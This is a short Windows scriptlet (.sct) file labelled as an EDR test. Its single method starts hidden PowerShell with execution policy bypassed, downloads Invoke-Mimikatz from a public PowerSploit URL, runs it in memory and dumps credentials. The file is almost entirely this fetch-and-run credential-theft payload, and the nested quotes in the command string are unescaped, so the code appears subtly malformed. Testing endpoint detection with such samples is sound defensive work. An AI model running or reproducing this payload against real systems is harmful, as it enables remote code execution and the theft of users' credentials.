<?XML version="1.0"?>
<scriptlet>
  <!-- EDR Test -->

<registration
    description="aaa"
    progid="aaa"
    version="1.00"
    classid="{VVVV2222-0000-0000-0000-0000AAAAAAAA}"
	>

</registration>

<public>
    <method name="Exec"></method>
</public>
<script language="JScript">
<![CDATA[

	function Exec()
	{
		var r = new ActiveXObject("WScript.Shell").Run("cmd /K "powershell.exe -windowStyle Hidden -ExecutionPolicy Bypass -Command "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"");
	}

]]>
</script>

</scriptlet>
